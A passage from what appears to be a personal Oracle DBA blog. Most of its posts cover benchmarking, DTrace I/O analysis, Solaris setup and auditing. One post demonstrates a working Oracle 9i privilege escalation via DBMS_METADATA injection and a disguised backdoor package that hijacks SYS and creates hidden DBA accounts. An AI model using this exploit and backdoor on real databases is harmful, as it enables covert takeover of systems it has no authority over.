Transaction throughput (number of transactions per minute)
Average response time for each transaction type

We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the FILESYSTEMIO_OPTIONS parameter.

So the comparisons from these 2 measurements are as follows:

While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.

Observing Oracle I/O Access Patterns with DTrace

In this post, I will use the seeks.d and iopattern DTrace scripts, which are available as part of the DTraceToolKit (This toolkit is an extremely useful collection of scripts created by Brendan Gregg), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel and so the job of finding access patterns has been greatly simplified.

The system on which these examples are being run has redo logs on one disk, datafiles on another disk and the control file is on another disk.

To get system-wide access patterns, the iopattern script can be used. Sample output is as follows:


# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
100    0      7   4096   8192   7606      4     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0

This output was generated on an idle system (0.04 load). You can see that the iopattern script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.

Now, look at the output generated from the iopattern script during a period of heavy database load:


# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
92    8     69   4096   8192   6589    304    140
86   14     69   4096   8192   5995    228    176
82   18     67   4096   8192   5257     64    280
84   16     19   4096   8192   6036     40     72
77   23     22   4096   8192   4282      0     92
88   12     68   4096 1015808  21744   1120    324
97    3     67   4096   8192   7274    400     76
89   11     66   4096   8192   6392    276    136
90   10     71   4096   8192   6345    216    224
87   13     62   4096   8192   5879    184    172
90   10     10   4096   8192   6553     40     24
100    0     17   8192   8192   8192     88     48
87   13     33   4096 1048576  38353   1168     68
86   14     65   4096   8192   6049    236    148

As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this one indication that the type of I/O typical in an OLTP environment is random (as we would expect).

To get the I/O distribution for each disk, the seeks.d script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the seeksize.d script provided with the DTraceToolKit and is available in the Solaris Internals volumes.

Sample output from the seeks.d script is show below:


# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@                    43
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            26
          256 |@@@@@@                                   12
          512 |                                         0

sd1
        value  ------------- Distribution ------------- count
        32768 |                                         0
        65536 |@@@@@@@@@@@@@@@@@@@@                     1
       131072 |                                         0
       262144 |                                         0
       524288 |                                         0
      1048576 |@@@@@@@@@@@@@@@@@@@@                     1
      2097152 |                                         0

This output was generated when the system was idle as before. This output summarizes the seeks performed by each disk on the system. The sd1 disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the length of the seeks are quite large. The disk on which the redo logs are located does not show up in the output above since no I/O is being generated on that disk (sd2).

Now, it is interesting to look at the output generated from the seeks.d script during a period when the database is under a heavy load.


# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@                  18
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            10
          256 |@@@@@                                    4
          512 |                                         0

sd2
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@           430
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |@@@@@@@@                                 120
           16 |@                                        11
           32 |                                         3
           64 |                                         0
          128 |                                         0
          256 |                                         0
          512 |                                         0
         1024 |                                         0
         2048 |                                         0
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |                                         6
       131072 |                                         0

sd1
        value  ------------- Distribution ------------- count
          512 |                                         0
         1024 |@@@                                      31
         2048 |                                         5
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |@@                                       23
       131072 |@@@@@@@@                                 92
       262144 |@@@@@@@                                  73
       524288 |@                                        6
      1048576 |                                         4
      2097152 |@                                        14
      4194304 |@@@                                      29
      8388608 |@@@@                                     40
     16777216 |@@@@@                                    56
     33554432 |@@@@@@                                   65
     67108864 |                                         0

This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).

The above post did not really contain any new information but I thought it would be cool to show a tiny bit of the possibility that DTrace has. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!

Installing & Configuring a USB NIC on Solaris

In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.

Obtaining the USB Driver

The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from here.

Installing the USB Driver

After downloading the driver, uncompress the gunzipped file and extract the archive as the root user.

# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar

This will create a upf-0.8.0 directory in the current directory. Change to the upf-0.8.0 directory. Now we need to perform the following to install the driver:

# make install
# ./adddrv.sh

After this has been completed, the driver has been installed but the system needs to be rebooted before we can use the new driver. Reboot the system using the following procedure:

# touch /reconfigure
# shutdown -i 0 -g0 y

This will scan for new hardware on reboot. The new NIC device will show up as /dev/upf0

Configuring the NIC Device

Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use).

# ifconfig upf0 plumb
# ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up

Making Sure the NIC Device Starts on Boot

To ensure that the new NIC device starts automatically on boot, we need to create a /etc/hostname file for that interface containing either the IP address configured for that interface of if we placed the IP address in the /etc/inet/hosts file, then the hostname for that interface.

Generating a System State Dump on HP-UX with gdb

I have previously used the gdb (GNU Debugger) to generate oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on Metalink (Note 121779.1) and in other locations.

The problem with this is that it does not work on the HP-UX platform. I found this out at the wrong time when trying to generate a system state dump during a database hang!

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...

Temporary Tablespace Groups

Temporary tablespace groups are a new feature introduced in Oracle10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is created. Its members can only be temporary tablespaces.

You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.

Group Creation

You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.

SQL> CREATE TEMPORARY TABLESPACE temp_test_1
2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'
3 SIZE 100 M
4 TABLESPACE GROUP temp_group_1;

Tablespace created.

SQL>

If the group temp_group_1 did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.

SQL> CREATE TEMPORARY TABLESPACE temp_test_2
2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'
3 SIZE 100 M
4 TABLESPACE GROUP '';

Tablespace created.

SQL>

Now we will alter this tablespace and add it to a group.

SQL> ALTER TABLESPACE temp_test_2
2 TABLESPACE GROUP temp_group_1;

Tablespace altered.

SQL>

To de-assign a temporary tablespace from a group, we issue an ALTER TABLESPACE command as so:

SQL> ALTER TABLESPACE temp_test_2
2 TABLESPACE GROUP '';

Tablespace altered.

SQL>

Assign Users to Temporary Tablespace Groups

In this example, we will assign the user SCOTT to the temporary tablespace group temp_group_1.

SQL> ALTER USER scott
2 TEMPORARY TABLESPACE temp_group_1;

User altered.

SQL>

Now when we query the DBA_USERS view to see SCOTT's default temporary tablespace, we will see that the group is his temporary tablespace now.

SQL> SELECT username, temporary_tablespace
2 FROM DBA_USERS
3 WHERE username = 'SCOTT';

USERNAME TEMPORARY_TABLESPACE
-------- ------------------------------
SCOTT TEMP_GROUP_1

SQL>

Data Dictionary Views

To view a temporary tablespace group and it smembers we can view the DBA_TABLESPACE_GROUPS data dictionary view.

SQL> SELECT * FROM DBA_TABLESPACE_GROUPS;

GROUP_NAME TABLESPACE_NAME
------------ ------------------------------
TEMP_GROUP_1 TEMP_TEST_1
TEMP_GROUP_1 TEMP_TEST_2

SQL>

Advantages of Temporary Tablespace Groups

Allows multiple default temporary tablespaces
A single SQL operation can use muultiple temporary tablespaces for sorting
Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.
If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.

Installing a Back Door in Oracle 9i

In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information on this post is based on information obtained from Pete Finnigin's website and the 2600 magazine. The version of the database we are using in this post is:

sys@ORA9R2> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Creating the User

In this example, we will create a user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so called inside threat). The user we will install the back door as is testUser. We will only grant CONNECT and RESOURCE to this user.

sys@ORA9R2> create user testUser identified by testUser;

User created.

sys@ORA9R2> grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER RESOURCE NO YES NO

testuser@ORA9R2>

Gaining DBA Privileges

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by Pete Finnigan. This exploit invloves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

testuser@ORA9R2> create or replace function testuser.hack return varchar2
2 authid current_user is
3 pragma autonomous_transaction;
4 begin
5 execute immediate 'grant dba to testUser';
6 return '';
7 end;
8 /

Function created.

testuser@ORA9R2> select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
2 from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in
function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER DBA NO YES NO
TESTUSER RESOURCE NO YES NO

testuser@ORA9R2>

As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

Creating and Installing the Back Door

Now, he/she can save what the encrypted form of the SYS user's password is before installing the back door.

testuser@ORA9R2> select username, password
2 from dba_users
3 where username = ‘SYS’ ;

USERNAME PASSWORD
-------- ------------------------------
SYS 43CA255A7916ECFE

testuser@ORA9R2>

Now, the attacker wants to install the back door as the SYS user so he/she alters the password of the SYS user so they can connect as the SYS user. The attacker will then change this password back to the saved password once finished installing the back door.

testuser@ORA9R2> alter user sys identified by pass;
User altered.
testuser@ORA9R2> connect sys/pass as sysdba
Connected.
testuser@ORA9R2>

Now the attacker is connected as the SYS user and starts on creating the back door. The attacker creates the back door like so:

testuser@ORA9R2> CREATE OR REPLACE PACKAGE dbms_xml AS
2 PROCEDURE parse (string IN VARCHAR2);
3 END dbms_xml;
4 /
Package created.
testuser@ORA9R2>
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100);
BEGIN
IF string = 'unlock' THEN
SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
COMMIT;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
END IF;
IF string = 'lock' THEN
EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;
IF string = 'make' THEN
EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
EXECUTE IMMEDIATE 'GRANT DBA TO hill';
END IF;
IF string = 'unmake' THEN
EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
END IF;
END;
END dbms_xml;
/

testuser@ORA9R2> CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2> GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2>

This package does the following (examples will be shown below):

It can unlock the SYS account by changing the password to a known password (in this case 'padraig').
Then, it can revert the SYS account's password back to the original password.
It can create a new user account with a known password that has the DBA role which can later be dropped from the database.

The attacker has now created a back door that can be very difficult to discover. The attacker has chosen a name for the package that looks like it was installed with the Oracle database. Now, the attacker changes the SYS user’s password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker will also revoke the DBA role from his/her user account to prevent detection. This role is no longer need by the attacker since he/her has installed the back door.

testuser@ORA9R2> alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2> revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2> disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER RESOURCE NO YES NO

In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.

testuser@ORA9R2> execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2> connect sys/padraig as sysdba
Connected.
testuser@ORA9R2> show user
USER is "SYS"
testuser@ORA9R2>

Now, the attacker is finished doing his/her work as the SYS user and will change the SYS password back to the original password by calling the back door again:

testuser@ORA9R2> execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2>

Conclusion

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the ALTER USER statement and checking SYS owned objects periodically.

OCFS2 Mount by Label Support

While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:

# mount -L "oradata" /ocfs2
mount: no such partition found
#

I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was - util-linux-2.12a-16.EL4.6.

After doing some research online, I discovered that in the latest versions of util-linux, Oracle has included a patch for mounting an OCFS2 filesystem by label.

So I grabbed the latest version of util-linux from Red Hat and viola, I am now able to mount an OCFS2 filesystem by its label.

The current version of util-linux on my system is - util-linux-2.12a-16.EL4.20.

White Paper at Oracle OpenWorld

A white paper that I was part of writing is being presented at Oracle OpenWorld this week. The paper is entitled 'High Availability Options for the Oracle Database'. It is being presented by Dan Norris and I wrote the sections on Export/Import and data pump. The paper is available for download from the IT Convergence website here.

Dan is kinda like my mentor here at IT Convergence. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.

At the moment, I've been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed this excellent article by Jeffrey Hunter on setting up a RAC environment with a budget!

OCFS2 would not play nice for me though so I decided to use RAW devices instead of OCFS like Mr. Hunter did in his article. Besides that though, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).

First Paper Accepted

I just found out that my first paper has been accepted! Its a pretty nice feeling. This paper was based on research I did in the summer of 2005 with the MISL research group in UCC.

A pre-print version of the paper is available here. It was accepted to a conference called First International Workshop on Practical Issues in Building Sensor Network Applications.

Now I'm hoping my paper on small-world networks gets accepted to the AI conference I submitted it to. If I decide to apply for graduate school again this fall, these published papers will make my application a lot better.

It really feels like a sense of achievement when your paper gets accepted and makes your work feel validated. I know thats a bit stupid because I should feel proud of my work anyway but I have to admit it does make me feel a bit prouder of it since it is now worthy of presentation at a scientific conference.

Anyway, fingers crossed on my next paper!!

Audting SYSDBA Users

I recently came accross this feature in Oracle introduced in 9i where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBA's are familiar with this
feature already but I have only just been enlightened!!

To enable this feature auditing must be enabled and the AUDIT_SYS_OPERATIONS parameter must be set to TRUE. For example:

sys@ORCLINS1> ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;

FALSE is the default value for this parameter. Pretty obvious from the above statement but the database must be restarted for the parameter to take affect.

All the audit records are then written to an operating system. The location of this file is determined by the AUDIT_FILE_DEST parameter.

sys@ORCLINS1> show parameter AUDIT_FILE_DEST

NAME TYPE VALUE

-------------- ------------------------------------------

audit_file_dest string /oracle/oracle/admin/orclpad/adump

sys@ORCLINS1>

An audit file will be created for each session started by a user logging in as SYSDBA. The audit file will contain the process ID of the server session that Oracle started for the user in its file name.

Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!

Padraig's Blog